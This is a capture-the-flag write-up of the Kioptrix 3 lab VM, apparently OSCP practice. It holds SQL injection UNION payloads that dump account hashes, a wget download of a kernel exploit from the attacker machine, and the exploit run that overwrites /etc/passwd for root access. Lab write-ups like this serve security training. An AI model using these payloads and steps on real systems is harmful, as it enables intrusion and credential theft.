Kioptrix 3 Write-Up
To prepare for OSCP1 I’m planning to do a whole bunch of VulnHub VMs and other challenges. Doing these VMs and creating write-ups should give a good amount of practice before I start with the actual PWK1 course.
Kioptrix 3
The Kioptrix series consist of multiple beginner boot2root VMs with multiple ways to gain a root shell2.
Setup
I’m using VMware with two VMs: Kali 2017.1 and Kioptrix 3.
Scanning & Enumeration
After finding the IP of the kioptrix VM we can perform the usual Nmap scan to get a quick overview of what is running on the VM:
root@vm-kali:~# nmap -T4 -sV 172.16.45.135
Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-25 19:35 MDT
Nmap scan report for 172.16.45.135
Host is up (0.00017s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
MAC Address: 00:0C:29:2D:80:64 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.45 seconds
Web Vulnerability
Again I first focused on any web based vulnerabilities to gain access to the system. I was hoping to find some file inclusion vulnerabilty in the main site, but I had no luck. After that I tried random things in the gallery and I happened to stumble across a basic SQLi:
http://kioptrix3.com/gallery/gallery.php?id='&sort=photoid#photos
Error:
You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ''order by parentid,sort,name' at line 1Could not select category
Now to abuse this to retrieve useful information from the database:
http://kioptrix3.com/gallery/gallery.php?id=-1 UNION SELECT 1,2,table_name,4,5,6 FROM information_schema.tables WHERE table_schema="gallery"&sort=photoid
gallarific_comments
gallarific_photos
gallarific_stats
dev_accounts
gallarific_galleries
gallarific_settings
gallarific_users
http://kioptrix3.com/gallery/gallery.php?id=-1 UNION SELECT 1,2,column_name,4,5,6 FROM information_schema.columns WHERE table_name="dev_accounts"&sort=photoid
id
password
username
http://kioptrix3.com/gallery/gallery.php?id=-1 UNION SELECT 1,username,password,4,5,6 FROM gallery.dev_accounts&sort=photoid
dreg:0d3eccfb887aabd50f243b3f155c0f85:Mast3r
loneferret:5badcaf789d3d1d09794d8f021f40f0e:starwars
The last query gives us a list of dev accounts with MD5 hashes for which we can find the plaintexts online. These credentials did not work on the admin login, but they did work on SSH.
Privilege Escalation
root@vm-kali:~# ssh [email protected]
[email protected]'s password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Tue Aug 29 21:26:36 2017 from 172.16.45.130
I used the kernel version to find an exploit via searchsploit and ended up with the following one3 that worked (after trying a couple of other exploits first because the list was long). As with Kioptrix 2, the source code was transfered to the target via SimpleHTTPServer and wget.
loneferret@Kioptrix3:~/test$ wget http://172.16.45.130:8000/40839.c
--19:31:57-- http://172.16.45.130:8000/40839.c
=> `40839.c'
Connecting to 172.16.45.130:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5,124 (5.0K) [text/plain]
100%[==================================================================================================>] 5,124 --.--K/s
19:31:57 (1001.15 MB/s) - `40839.c' saved [5124/5124]
loneferret@Kioptrix3:~/test$ gcc -pthread 40839.c -o dirty -lcrypt
loneferret@Kioptrix3:~/test$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password:
Complete line:
firefart:fi6bS9A.C7BDQ:0:0:pwned:/root:/bin/bash
mmap: b7fe0000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created
You can log in with username firefart and password test.
DON'T FORGET TO RESTORE /etc/passwd FROM /tmp/passwd.bak !!!
Done! Check /etc/passwd to see if the new user was created
You can log in with username firefart and password test.
DON'T FORGET TO RESTORE /etc/passwd FROM /tmp/passwd.bak !!!
loneferret@Kioptrix3:~/test$ id
uid=1000(loneferret) gid=100(users) groups=100(users)
Lets use the credentials of the newly created user to log into the target:
root@vm-kali:~# ssh [email protected]
[email protected]'s password:
Last login: Tue Aug 29 19:34:19 2017 from 172.16.45.130
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
firefart@Kioptrix3:~# pwd
/root
firefart@Kioptrix3:~# id
uid=0(firefart) gid=0(root) groups=0(root)
Additional notes
Same as the last one I figure that there are more ways than this to get into the target, but these were the ones I found.